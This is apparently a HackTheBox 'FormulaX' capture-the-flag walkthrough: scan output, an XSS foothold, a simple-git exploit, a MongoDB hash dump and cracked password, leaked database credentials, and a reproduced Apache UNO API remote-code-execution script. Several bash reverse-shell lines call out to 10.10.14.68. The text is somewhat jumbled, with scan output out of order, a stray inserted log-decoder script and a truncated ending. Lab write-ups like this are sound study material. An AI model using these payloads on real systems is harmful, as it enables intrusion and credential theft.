HTB FormulaX
📄 IP Address: 10.10.11.6
Host: formulax.htb
Website
http://formulax.htb
Browsing to the website, we notice that the host redirects to
http://formulax.htb/static/index.html, which seems to be a login page. There is an option to
create an account, so let's create one.
Since the registration was successful, let's log in and check the site.
I submitted the query “Tell me about yourself” and it responded with
nmapAutomator
|_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-cors: GET POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
| http-enum:
| /admin/: Possible admin folder
| /admin/admin/: Possible admin folder
| /admin/account.php: Possible admin folder
| /admin/index.php: Possible admin folder
| /admin/login.php: Possible admin folder
| /admin/admin.php: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/home.php: Possible admin folder
| /admin/controlpanel.php: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/cp.php: Possible admin folder
| /admin/admin_login.php: Possible admin folder
| /admin/admin-login.php: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/adminLogin.php: Possible admin folder
| /admin/account.cfm: Possible admin folder
| /admin/index.cfm: Possible admin folder
| /admin/login.cfm: Possible admin folder
| /admin/admin.cfm: Possible admin folder
| /admin/admin_login.cfm: Possible admin folder
| /admin/controlpanel.cfm: Possible admin folder
| /admin/cp.cfm: Possible admin folder
| /admin/adminLogin.cfm: Possible admin folder
| /admin/admin-login.cfm: Possible admin folder
| /admin/home.cfm: Possible admin folder
| /admin/account.asp: Possible admin folder
| /admin/index.asp: Possible admin folder
| /admin/login.asp: Possible admin folder
| /admin/admin.asp: Possible admin folder
| /admin/home.asp: Possible admin folder
| /admin/controlpanel.asp: Possible admin folder
| /admin/admin-login.asp: Possible admin folder
| /admin/cp.asp: Possible admin folder
| /admin/admin_login.asp: Possible admin folder
| /admin/adminLogin.asp: Possible admin folder
| /admin/account.aspx: Possible admin folder
| /admin/index.aspx: Possible admin folder
| /admin/login.aspx: Possible admin folder
| /admin/admin.aspx: Possible admin folder
| /admin/home.aspx: Possible admin folder
| /admin/controlpanel.aspx: Possible admin folder
| /admin/admin-login.aspx: Possible admin folder
| /admin/cp.aspx: Possible admin folder
| /admin/admin_login.aspx: Possible admin folder
| /admin/adminLogin.aspx: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /Admin/: Possible admin folder
| /admin/backup/: Possible backup
| /admin/download/backup.sql: Possible database backup
| /admin/upload.php: Admin File Upload
| /admin/CiscoAdmin.jhtml: Cisco Collaboration Server
| /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.php: Lizard Cart/Remote File upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
| /admin/jscript/upload.pl: Lizard Cart/Remote File upload
| /admin/jscript/upload.asp: Lizard Cart/Remote File upload
| /admin/environment.xml: Moodle files
|_ /logout/: Potentially interesting folder
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There is nothing eye-catching other than the port 4345. Let's do directory enumeration.
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Target: http://formulax.htb/
Task Completed
The only interesting thing we see is the restricted/contact_us.html page, through which we can
contact the Admin directly.
There seems to be a possibility of XSS via this form. Let's verify it.
We seem to be able to upload files from our Kali machine to the target machine.
👣Foothold
Since we can upload files into the machine via XSS, we can create a payload to exploit
this.
This payload script sets up a real-time connection to a server, listens for message events
from the server, and sends a GET request to a specified URL whenever a ‘message’ event is
received. It also sends a client_message event with the data history to the server.
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54906 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54926 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 [404]: OPTIONS /?d=V3JpdGUgYSBzY3JpcHQgdG8gYXV0b21hdGUgdGhlIGF1dG8tdXBkYXRl - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 [404]: OPTIONS /?d=TWVzc2FnZSBTZW50Ojxicj5oaXN0b3J5 - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Closing
Greetings!. How can i help you today ?. You can type help to see some
buildin commands
Hello, I am Admin.Testing the Chat Application
Write a script for
dev-git-auto-update.chatbot.htb to work properly
Write a script to automate the auto-update
Message Sent:<br>history
From the decoded messages we get a subdomain, dev-git-auto-update.chatbot.htb. Let's add it
to the hosts file and check the site.
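The `d=` values in the listener log above are Base64-encoded chat messages. The decoding step is shown here as an added example (not part of the original write-up); an analyst can run the same logic over proxy or web-server logs to see what an injected script sent out. The function names, the 16-character minimum and the final benign log line are assumptions made for this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Sample input: the two request lines from the log above (line wraps rejoined),
# one connection line, and one benign request that is constructed for contrast.
SAMPLE_LOG = """\
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 [404]: OPTIONS /?d=V3JpdGUgYSBzY3JpcHQgdG8gYXV0b21hdGUgdGhlIGF1dG8tdXBkYXRl - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 [404]: OPTIONS /?d=TWVzc2FnZSBTZW50Ojxicj5oaXN0b3J5 - No such file or directory
[Sat Mar 16 01:36:04 2024] 10.10.11.6:54940 [200]: GET /index.html?page=2
"""

# "[timestamp] peer [status]: METHOD target ..." as printed in the log above.
REQUEST_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<peer>\S+)\s+\[(?P<status>\d{3})\]:\s+"
    r"(?P<method>[A-Z]+)\s+(?P<target>\S+)"
)

# Standard or URL-safe Base64 alphabet, long enough to be worth decoding.
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")


def try_b64_text(value):
    """Return the decoded text if value is Base64 for printable UTF-8, else None."""
    if not B64_RE.match(value):
        return None
    # Normalise the URL-safe alphabet and restore padding that URLs often drop.
    normalised = value.replace("-", "+").replace("_", "/")
    normalised += "=" * (-len(normalised) % 4)
    try:
        raw = base64.b64decode(normalised, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        # Covers bad Base64 and UnicodeDecodeError (a ValueError subclass).
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def find_encoded_params(log_text):
    """Scan request lines and decode query values that carry Base64 text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # "Accepted"/"Closing" lines carry no request
        query = urlsplit(m["target"]).query
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            # unquote() rather than parse_qsl(): the latter turns '+' into a
            # space, which would corrupt standard-alphabet Base64.
            text = try_b64_text(unquote(value))
            if text is not None:
                findings.append({
                    "timestamp": m["ts"],
                    "peer": m["peer"],
                    "method": m["method"],
                    "param": key,
                    "decoded": text,
                })
    return findings


if __name__ == "__main__":
    for hit in find_encoded_params(SAMPLE_LOG):
        print(f'{hit["timestamp"]} {hit["peer"]} {hit["method"]} '
              f'{hit["param"]} -> {hit["decoded"]!r}')
```
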
At the bottom we can notice that this page is built using simple-git v3.14. Upon further
research I came to know that this version has a vulnerability:
https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221
Let's exploit this vulnerability. First of all, let's create a shell file called shell.sh.
#️⃣Privilege Escalation
A thorough search showed that the target machine has MongoDB installed.
www-data@formulax:/var/lib$ ls -la
total 152
drwxr-xr-x 38 root root 4096 Feb 20 16:16 .
drwxr-xr-x 14 root root 4096 Feb 20 16:16 ..
drwxr-xr-x 2 root root 4096 Jun 7 2023 PackageKit
drwxr-xr-x 3 root root 4096 Jun 7 2023 apport
drwxr-xr-x 5 root root 4096 Mar 5 09:57 apt
drwxr-xr-x 2 root root 4096 Jul 22 2023 aspell
drwxr-xr-x 8 root root 4096 Jan 30 07:56 cloud
drwxr-xr-x 2 root root 4096 Jun 7 2023 dbus
drwxr-xr-x 2 root root 4096 Feb 16 15:13 dhcp
drwxr-xr-x 3 root root 4096 Jul 22 2023 dictionaries-common
drwxr-xr-x 7 root root 4096 Mar 5 09:57 dpkg
drwxr-xr-x 3 root root 4096 Jul 22 2023 emacsen-common
drwxr-xr-x 4 root root 4096 Jun 15 2023 ghostscript
drwxr-xr-x 2 root root 4096 Apr 26 2023 git
drwxr-xr-x 4 root root 4096 Jun 7 2023 grub
drwxr-xr-x 2 root root 4096 Jul 22 2023 ispell
drwxr-xr-x 3 root root 4096 Jul 22 2023 libreoffice
drwxr-xr-x 2 root root 4096 Jul 22 2023 man-db
drwxr-xr-x 2 root root 4096 Apr 18 2022 misc
drwxr-xr-x 4 mongodb mongodb 4096 Mar 15 21:07 mongodb
drwxr-xr-x 6 mysql mysql 4096 Mar 15 19:26 mysql
drwxr-xr-x 7 root root 4096 Jun 11 2023 nginx
drwxr-xr-x 2 root root 4096 Mar 24 2022 os-prober
drwxr-xr-x 2 root root 4096 Feb 19 15:36 pam
drwxr-xr-x 4 root root 4096 Jun 15 2023 php
drwxr-xr-x 2 root root 4096 Mar 18 2022 plymouth
drwx------ 3 root root 4096 Feb 17 2023 polkit-1
drwx------ 2 root root 4096 Feb 17 2023 private
drwxr-xr-x 2 root root 4096 Feb 17 2023 python
-rw-r--r-- 1 root root 0 Feb 17 2023 shells.state
drwxr-xr-x 3 Debian-snmp Debian-snmp 4096 Feb 20 16:16 snmp
drwxr-xr-x 3 root root 4096 Feb 17 2023 sudo
drwxr-xr-x 12 root root 4096 Feb 19 13:36 systemd
drwxr-xr-x 2 root root 4096 Mar 16 2022 ubuntu-drivers-common
drwxr-xr-x 2 root root 4096 Feb 19 16:05 ubuntu-release-upgrader
drwxr-xr-x 3 root root 4096 Jan 30 08:03 ucf
drwxr-xr-x 2 root root 4096 Feb 10 2023 update-notifier
drwxr-xr-x 2 root root 4096 Mar 9 2022 upower
drwxr-xr-x 3 root root 4096 Jan 30 08:05 vmware
www-data@formulax:/tmp$ mongo
MongoDB shell version v4.4.29
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("74bb87f6-dc6a-41e2-afc2-fcb552d528cd") }
MongoDB server version: 4.4.8
---
The server generated these startup warnings when booting:
2024-03-15T19:26:23.021+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
2024-03-15T19:26:24.573+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
testing 0.000GB
> use testing
switched to db testing
> show collections
messages
users
> db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTA1MzczODV9.2YCy-Qfh_uk_pb55k9-7jygxfhiXsbfJP65fLGDTuvM", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Here we get the password hash of the user frank. Let's crack it with John the Ripper.
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:07 DONE (2024-03-16 02:53) 0.1305g/s 375.9p/s 375.9c/s 375.9C/s onlyme..soccer9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Running sudo -l does not reveal any privilege escalation information, so next we check the
ports listening in the background.
frank_dorky@formulax:~$ sudo -l
[sudo] password for frank_dorky:
Sorry, user frank_dorky may not run sudo on forumlax.
frank_dorky@formulax:~$ netstat -avn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:8082 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:44139 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:37191 0.0.0.0:* LISTEN
unix 3 [ ] STREAM CONNECTED 5866431
HTB_FormulaX 26
unix 3 [ ] STREAM CONNECTED 39350
unix 2 [ ] DGRAM CONNECTED 27636
unix 3 [ ] STREAM CONNECTED 5866438
unix 3 [ ] STREAM CONNECTED 39900
unix 3 [ ] STREAM CONNECTED 5866459
unix 3 [ ] STREAM CONNECTED 32242
unix 3 [ ] STREAM CONNECTED 887001
unix 3 [ ] STREAM CONNECTED 38528
unix 2 [ ] DGRAM 33260
unix 3 [ ] DGRAM CONNECTED 28643
unix 3 [ ] STREAM CONNECTED 5867521 /run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 32780
unix 3 [ ] STREAM CONNECTED 40020
unix 2 [ ] DGRAM CONNECTED 29089
unix 3 [ ] STREAM CONNECTED 5866855
unix 3 [ ] STREAM CONNECTED 39447
unix 3 [ ] STREAM CONNECTED 29733 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 39348
unix 3 [ ] STREAM CONNECTED 5866450
unix 3 [ ] STREAM CONNECTED 39899
unix 3 [ ] STREAM CONNECTED 886997
unix 3 [ ] STREAM CONNECTED 5866481
unix 3 [ ] SEQPACKET CONNECTED 5866407
unix 3 [ ] STREAM CONNECTED 5866457
unix 3 [ ] STREAM CONNECTED 41048
unix 3 [ ] DGRAM CONNECTED 28641
unix 3 [ ] STREAM CONNECTED 5866819
unix 3 [ ] STREAM CONNECTED 39871
unix 3 [ ] STREAM CONNECTED 39449
unix 3 [ ] DGRAM CONNECTED 31828
unix 3 [ ] STREAM CONNECTED 40028
unix 3 [ ] STREAM CONNECTED 5809899
unix 3 [ ] STREAM CONNECTED 39921
unix 3 [ ] STREAM CONNECTED 40025 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 38509
unix 3 [ ] STREAM CONNECTED 5866392
unix 3 [ ] STREAM CONNECTED 5866490
unix 2 [ ] DGRAM 33227
unix 3 [ ] STREAM CONNECTED 32298
unix 3 [ ] STREAM CONNECTED 5866950
unix 3 [ ] DGRAM CONNECTED 28642
unix 3 [ ] STREAM CONNECTED 30609 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866818
unix 3 [ ] STREAM CONNECTED 39450
unix 3 [ ] STREAM CONNECTED 40024 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33197
unix 3 [ ] STREAM CONNECTED 5866451
unix 3 [ ] STREAM CONNECTED 39926
unix 3 [ ] STREAM CONNECTED 27610
netstat: no support for `AF IPX' on this system.
HTB_FormulaX 27
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.
netstat: no support for `AF ROSE' on this system.
<title>Redirecting to http://127.0.0.1:3000/login</title>
</head>
<body>
Redirecting to <a href="http://127.0.0.1:3000/login">http://127.0.0.1:3000/login</a>.
</body>
</html>
frank_dorky@formulax:~$ cd /opt/librenms
frank_dorky@formulax:/opt/librenms$ ls -l adduser.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
frank_dorky@formulax:/opt/librenms$ ./adduser.php test test 10
User test added successfully
We get to the control panel. Before we can create our own templates, we need to fix the error in Webserver.
Enter the PHP as given below:
@php
system("bash -c '/bin/bash -i >& /dev/tcp/10.10.14.68/5550 0>&1'");
@endphp
We got a reverse connection
librenms@formulax:~$ ls -la
total 5216
drwxrwx--x 27 librenms librenms 4096 Feb 19 13:33 .
drwxr-xr-x 3 root root 4096 Feb 16 15:21 ..
lrwxrwxrwx 1 root root 9 Feb 19 13:33 .bash_history -> /dev/null
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .cache
-rw-r--r-- 1 librenms librenms 815 Oct 18 2022 .codeclimate.yml
drwxrwxr-x 3 librenms librenms 4096 Feb 16 15:21 .config
-rw-rw-r-- 1 librenms librenms 353 Sep 7 2023 .custom.env
-rw-r--r-- 1 librenms librenms 258 Oct 18 2022 .editorconfig
-rw-r--r-- 1 librenms librenms 73 Oct 18 2022 .env.example
-rw-r--r-- 1 librenms librenms 197 Oct 18 2022 .env.travis
-rw-r--r-- 1 librenms librenms 858 Oct 18 2022 .git-blame-ignore-revs
drwxr-xr-x 4 librenms librenms 4096 Oct 18 2022 .github
-rw-r--r-- 1 librenms librenms 637 Oct 18 2022 .gitignore
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .local
-rw-r--r-- 1 librenms librenms 5434 Oct 18 2022 .php-cs-fixer.php
-rw------- 1 librenms librenms 1024 Feb 16 15:53 .rnd
-rw-r--r-- 1 librenms librenms 182 Oct 18 2022 .scrutinizer.yml
-rw-r--r-- 1 librenms librenms 103 Oct 18 2022 .styleci.yml
-rw-r--r-- 1 librenms librenms 11411 Oct 18 2022 AUTHORS.md
-rw-r--r-- 1 librenms librenms 94 Oct 18 2022 CHANGELOG.md
-rw-r--r-- 1 librenms librenms 93 Oct 18 2022 CODE_OF_CONDUCT.md
-rw-r--r-- 1 librenms librenms 170 Oct 18 2022 CONTRIBUTING.md
-rw-r--r-- 1 librenms librenms 35337 Oct 18 2022 LICENSE.txt
drwxr-xr-x 20 librenms librenms 4096 Feb 16 15:40 LibreNMS
-rw-r--r-- 1 librenms librenms 10040 Oct 18 2022 README.md
-rw-r--r-- 1 librenms librenms 1189 Oct 18 2022 SECURITY.md
-rwxr-xr-x 1 librenms librenms 7518 Oct 18 2022 addhost.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
-rwxr-xr-x 1 librenms librenms 1827 Oct 18 2022 alerts.php
drwxr-xr-x 22 librenms librenms 4096 Oct 18 2022 app
-rwxr-xr-x 1 librenms librenms 1686 Oct 18 2022 artisan
-rwxr-xr-x 1 librenms librenms 6534 Oct 18 2022 billing-calculate.php
drwxr-xr-x 3 librenms librenms 4096 Feb 16 15:51 bootstrap
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 cache
-rwxr-xr-x 1 librenms librenms 3334 Oct 18 2022 check-services.php
-rw-r--r-- 1 librenms librenms 5414 Oct 18 2022 composer.json
-rw-r--r-- 1 librenms librenms 457017 Oct 18 2022 composer.lock
-rwxr-xr-x 1 librenms librenms 2975214 Feb 16 15:21 composer.phar
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 config
-rw-r--r-- 1 librenms librenms 1702 Oct 18 2022 config.php.default
-rwxr-xr-x 1 librenms librenms 368 Oct 18 2022 config_to_json.php
-rwxr-xr-x 1 librenms librenms 880 Oct 18 2022 cronic
-rw-r--r-- 1 librenms librenms 14640 Oct 18 2022 daily.php
-rwxr-xr-x 1 librenms librenms 14962 Oct 18 2022 daily.sh
drwxr-xr-x 6 librenms librenms 4096 Oct 18 2022 database
-rwxr-xr-x 1 librenms librenms 517 Oct 18 2022 delhost.php
-rwxr-xr-x 1 librenms librenms 1877 Oct 18 2022 discovery-wrapper.py
-rwxr-xr-x 1 librenms librenms 4206 Oct 18 2022 discovery.php
-rwxr-xr-x 1 librenms librenms 2211 Oct 18 2022 dist-pollers.php
drwxr-xr-x 11 librenms librenms 4096 Oct 18 2022 doc
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 html
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 includes
-rwxr-xr-x 1 librenms librenms 976 Oct 18 2022 irc.php
-rwxr-xr-x 1 librenms librenms 2067 Oct 18 2022 librenms-service.py
-rw-r--r-- 1 librenms librenms 580 Oct 18 2022 librenms.cron
-rw-r--r-- 1 librenms librenms 1055 Oct 18 2022 librenms.nonroot.cron
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 licenses
-rwxr-xr-x 1 librenms librenms 1779 Oct 18 2022 lnms
drwxrwxr-x+ 2 librenms librenms 4096 Feb 16 15:21 logs
drwxr-xr-x 301 librenms librenms 20480 Oct 18 2022 mibs
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 misc
-rw-r--r-- 1 librenms librenms 10210 Oct 18 2022 mkdocs.yml
-rw-r--r-- 1 librenms librenms 793386 Oct 18 2022 package-lock.json
-rw-r--r-- 1 librenms librenms 1341 Oct 18 2022 package.json
-rwxr-xr-x 1 librenms librenms 3841 Oct 18 2022 pbin.sh
-rw-r--r-- 1 librenms librenms 171565 Oct 18 2022 phpstan-baseline-deprecated.neon
-rw-r--r-- 1 librenms librenms 422134 Oct 18 2022 phpstan-baseline.neon
-rw-r--r-- 1 librenms librenms 537 Oct 18 2022 phpstan-deprecated.neon
-rw-r--r-- 1 librenms librenms 838 Oct 18 2022 phpstan.neon
-rw-r--r-- 1 librenms librenms 1515 Oct 18 2022 phpunit.xml
-rwxr-xr-x 1 librenms librenms 749 Oct 18 2022 ping.php
-rwxr-xr-x 1 librenms librenms 7322 Oct 18 2022 poll-billing.php
-rwxr-xr-x 1 librenms librenms 1872 Oct 18 2022 poller-wrapper.py
-rwxr-xr-x 1 librenms librenms 5568 Oct 18 2022 poller.php
-rwxr-xr-x 1 librenms librenms 1064 Oct 18 2022 renamehost.php
-rw-r--r-- 1 librenms librenms 87 Oct 18 2022 requirements.txt
drwxr-xr-x 7 librenms librenms 4096 Oct 18 2022 resources
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 routes
drwxrwxr-x+ 2 librenms librenms 4096 Oct 18 2022 rrd
drwxr-xr-x 5 librenms librenms 4096 Oct 18 2022 scripts
-rw-r--r-- 1 librenms librenms 543 Oct 18 2022 server.php
-rwxr-xr-x 1 librenms librenms 1880 Oct 18 2022 services-wrapper.py
-rwxr-xr-x 1 librenms librenms 10194 Oct 18 2022 snmp-scan.py
-rw-r--r-- 1 librenms librenms 880 Oct 18 2022 snmpd.conf.example
-rwxr-xr-x 1 librenms librenms 538 Oct 18 2022 snmptrap.php
drwxr-xr-x 2 librenms librenms 12288 Oct 18 2022 sql-schema
drwxrwxr-x+ 6 librenms librenms 4096 Oct 18 2022 storage
-rwxr-xr-x 1 librenms librenms 523 Oct 18 2022 syslog.php
-rw-r--r-- 1 librenms librenms 776 Oct 18 2022 tailwind.config.js
drwxr-xr-x 10 librenms librenms 4096 Oct 18 2022 tests
-rwxr-xr-x 1 librenms librenms 5278 Oct 18 2022 validate.php
drwxrwxr-x 76 librenms librenms 4096 Feb 16 15:53 vendor
-rw-r--r-- 1 librenms librenms 709 Oct 18 2022 webpack.mix.js
DB_HOST=localhost
DB_DATABASE=librenms
DB_USERNAME=kai_relay
DB_PASSWORD=mychemicalformulaX
#APP_URL=
NODE_ID=648b260eb18d2
VAPID_PUBLIC_KEY=BDhe6thQfwA7elEUvyMPh9CEtrWZM1ySaMMIaB10DsIhGeQ8Iks8kL6uLtjMsHe61-ZCC6f6XgPVt7O6liSqpvg
VAPID_PRIVATE_KEY=chr9zlPVQT8NsYgDGeVFda-AiD0UWIY6OW-jStiwmTQ
In this way, I successfully obtained the kai_relay user and logged in directly via ssh.
kai_relay@formulax:~$ sudo -l
Matching Defaults entries for kai_relay on forumlax:
env_reset, timestamp_timeout=0, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_reset, timestamp_timeout=0
Checking sudo -l, we can see that we have access to office. Let's exploit it with the following script:
"""
# Exploit Title: Apache UNO API RCE
# Date: 2018-09-18
# Exploit Author: sud0woodo
# Vendor Homepage: https://www.apache.org/
# Software Link: https://www.openoffice.org/api/
# Version:
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
HackDefense advisory:
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
HackDefense blogpost:
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
This code represents a small proof of concept of an unauthenticated remote code execution using
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.
For this PoC to work the target machine needs to run the ServiceManager using an external
interface. The following command was used to test this PoC:
[Ubuntu]
Open a terminal and execute the following command:
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible
flag to prevent the dialogbox from popping up on the target.
I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/
"""
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext)
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("calc.exe", '',1)
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.68/4444 0>&1
chmod +x /tmp/shell.sh
Now open another SSH terminal for kai_relay@formulax and execute the following code
Now come back to the kai_relay@formulax terminal and create a Python file called exp.py
#
#HackDefense advisory:
#https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
#
#HackDefense blogpost:
#https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
#
#Unauthenticated RCE LibreOffice/OpenOffice with UNO API
#
#This code represents a small proof of concept of an unauthenticated remote code execution using
#the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested
#against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.
#
#For this PoC to work the target machine needs to run the ServiceManager using an external
#interface. The following command was used to test this PoC:
#
#[Ubuntu]
#Open a terminal and execute the following command:
# soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
#
#The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible
#flag to prevent the dialogbox from popping up on the target.
#
#I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:
#
#https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext)
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
